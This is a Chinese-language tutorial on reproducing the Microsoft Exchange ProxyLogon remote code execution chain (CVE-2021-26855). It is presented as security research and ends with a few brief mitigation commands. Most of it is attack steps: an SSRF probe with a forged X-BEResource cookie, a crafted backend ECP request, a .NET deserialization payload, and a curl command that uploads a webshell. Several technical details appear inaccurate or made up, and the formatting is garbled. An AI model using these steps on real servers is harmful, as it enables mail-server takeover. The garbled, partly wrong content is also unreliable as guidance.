# 如何進行微軟Exchange服務遠程代碼執行漏洞復現
## 前言
微軟Exchange Server作為企業級郵件和協作平臺,歷史上曾多次曝出高危漏洞。本文將以CVE-2021-26855(ProxyLogon漏洞鏈)為例,詳細講解遠程代碼執行(RCE)漏洞的復現過程,僅供安全研究學習使用。
---
## 一、漏洞背景
### 1.1 漏洞基本信息
- **CVE編號**:CVE-2021-26855
- **漏洞類型**:SSRF→反序列化→RCE
- **影響版本**:
- Exchange Server 2013 < 15.0.1497.12
- Exchange Server 2016 < 15.1.2106.8
- Exchange Server 2019 < 15.2.721.13
### 1.2 技術原理
該漏洞鏈通過:
1. 利用SSRF繞過身份驗證
2. 訪問后端ECP接口
3. 通過反序列化實現代碼執行
---
## 二、環境準備
### 2.1 靶機環境搭建
```bash
# 使用Docker快速搭建測試環境
docker run -d \
--name exchange-vuln \
-p 443:443 \
-p 80:80 \
-p 25:25 \
-e ACCEPT_EULA=Y \
-e EXCHANGE_VERSION=2016 \
vulhub/exchange:2016-CVE-2021-26855
| 工具名稱 | 用途 |
|---|---|
| Nmap | 端口掃描 |
| Proxychains | 流量代理 |
| Python3 | 運行EXP |
| Git | 下載POC |
git clone https://github.com/project-zero/POC-for-CVE-2021-26855.git
cd POC-for-CVE-2021-26855
pip install -r requirements.txt
nmap -sV -p 443,25,80 <target_ip>
典型特征:
- 443端口運行Microsoft IIS
- HTTP頭包含X-FEServer字段
使用Python腳本檢測:
import requests
target = "https://<exchange_server>/ecp/"
headers = {
"Cookie": "X-BEResource=localhost~1942062522",
"Content-Type": "text/xml"
}
response = requests.post(target, headers=headers, verify=False)
if "Autodiscover" in response.text:
print("[+] Vulnerable to SSRF")
構造特殊請求訪問后端API:
POST /ecp/proxyLogon.ecp HTTP/1.1
Host: <exchange_server>
Cookie: X-BEResource=AdminAPI~1942062522;
通過.NET反序列化實現RCE:
from ysoserial import generate
payload = generate(
'ActivitySurrogateSelectorFromFile',
'exploit.xml',
formatter='BinaryFormatter'
)
curl -k -X POST \
"https://<exchange_server>/owa/auth/Current/themes/resources/evil.aspx" \
--data-binary @shell.aspx
graph TD
A[SSRF請求] --> B[繞過身份驗證]
B --> C[訪問ECP后端]
C --> D[反序列化執行]
D --> E[寫入WebShell]
Exchange處理請求的缺陷代碼:
// 存在問題的SSRF檢查邏輯
if (url.Contains("localhost") || url.StartsWith("/"))
{
// 允許內部請求
ProcessRequest(url);
}
# 禁用相關虛擬目錄
Set-OWAVirtualDirectory -Identity "owa (Default Web Site)" -ExternalUrl $null
.\Setup.exe /PrepareSchema /IAcceptExchangeServerLicenseTerms
